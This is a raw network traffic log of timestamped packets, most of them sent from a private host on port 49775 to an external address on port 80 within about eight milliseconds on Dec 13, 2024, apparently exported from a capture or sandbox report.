Dec 13, 2024 01:37:36.055020094 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.055039883 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.055057049 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.055078983 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.055098057 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.055119038 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.055135012 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.055350065 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.055377007 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.055392981 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.055416107 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.055428982 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.055450916 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.055464983 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.055480957 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.055494070 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.055516005 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.055529118 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.055553913 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.055567980 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.055586100 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.055603981 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.055624008 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.055718899 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.055732965 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.055749893 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.055772066 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.055839062 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.055852890 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.055932999 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.055958033 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.055972099 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.055994987 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.056014061 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.056026936 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.056057930 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.056145906 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.056199074 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.056231022 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.056246042 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.056273937 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.056288958 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.056653976 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.056653976 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.056653976 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.056653976 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.056673050 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.056695938 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.056720018 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.056740046 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.056766033 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.056837082 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.056837082 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.056854010 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.056893110 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.056907892 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.056926966 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.056943893 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.056973934 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.056988955 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.057035923 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.057123899 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.057188988 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.057188988 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.057204962 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.057224035 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.057239056 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.057266951 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.057285070 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.057307005 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.057321072 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.057343960 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.057360888 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.057399035 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.057418108 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.057450056 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.057462931 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.057493925 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.057507038 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.057535887 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.057565928 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.057581902 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.057612896 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.057626963 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.057652950 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.057667017 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.057694912 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.057713032 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.057734013 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.057759047 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.057770967 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.057800055 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.057813883 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.057841063 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.057854891 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.057878971 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.057894945 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.057921886 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.057934999 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.057960033 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.057976007 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.058003902 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.058033943 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.058198929 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.058198929 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.058198929 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.058198929 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.058218956 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.058254957 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.058280945 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.058306932 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.058381081 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.058381081 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.058381081 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.058418036 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.058432102 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.058456898 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.058470964 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.058492899 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.058506012 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.058527946 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.058542013 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.058588982 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.058656931 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.058656931 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.058703899 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.058737993 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.058803082 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.058803082 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.058820009 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.058840036 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.058851004 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.058876991 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.058890104 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.058912039 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.058926105 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.058948994 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.058964014 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.058984041 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059005022 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059020042 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059045076 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059060097 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059077978 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059091091 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059113026 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059129000 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059153080 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059165955 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059186935 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059201002 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059221983 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059236050 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059259892 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059273005 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059295893 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059320927 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059334040 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059350967 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059365988 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059389114 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059402943 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059421062 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059437990 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059458017 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059484005 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059498072 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059556007 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059570074 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059591055 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059613943 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059633970 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059650898 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059672117 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059695005 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059715033 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059731007 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059753895 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059768915 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059792995 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059808016 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059834003 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059850931 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059884071 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059900045 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059907913 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059936047 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.059952974 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.060014963 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.060107946 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.060107946 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.060123920 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.060148001 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.060163021 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.060178995 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.060199022 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.060220957 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.060235023 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.060256004 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.060270071 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.060290098 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.060305119 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.060328007 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.060340881 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.060364962 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.060384035 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.060404062 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.060417891 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.060440063 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.060463905 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.060477972 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.060499907 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.060513020 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.060539961 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.060553074 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.060574055 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.060595036 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.060609102 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.060630083 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.060643911 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.060667038 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.060679913 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.060702085 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.060719967 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.060729980 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.060794115 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.060805082 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.060813904 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.060816050 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.060822010 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.060837984 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.060851097 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.060893059 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.060939074 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.060952902 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.060976982 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.060992956 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.060996056 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.061007023 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.061016083 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.061018944 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.061026096 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.061033964 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.061033964 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.061053991 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.061072111 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.061081886 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.061105967 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.061129093 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.061144114 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.061167002 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.061182976 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.061203003 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.061217070 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.061240911 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.061259985 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.061283112 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.061299086 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.061321974 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.061336994 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.061424017 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.061424017 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.061444998 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.061470032 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.061496019 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.061510086 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.061562061 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.061628103 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.061642885 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.061670065 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.061686039 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.061716080 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.061743021 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.061765909 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.061779022 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.061808109 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.061824083 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.061851978 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.061866999 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.061893940 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.061913013 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.061938047 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.061950922 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.061978102 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.061994076 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.062043905 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.062081099 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.062105894 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.062134027 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.062150002 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.062208891 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.062269926 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.062289000 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.062330008 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.062345028 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.062361956 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.062375069 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.062398911 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.062419891 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.062457085 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.062491894 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.062515020 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.062530994 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.062557936 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.062581062 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.062606096 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.062638044 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.062653065 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.062678099 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.062691927 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.062716961 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.062731981 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.062756062 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.062774897 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.062793016 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.062822104 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.062835932 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.062863111 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.062886000 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.062912941 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.062933922 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.062961102 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.062973976 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.063000917 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.063015938 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.063040972 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.063071012 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.063086033 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.063129902 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.063129902 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.063150883 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.063175917 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.063251972 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.063251972 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.063281059 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.063338041 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.063354015 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.063369036 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.063396931 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.063411951 CET	49775	80	192.168.2.5	185.81.68.147
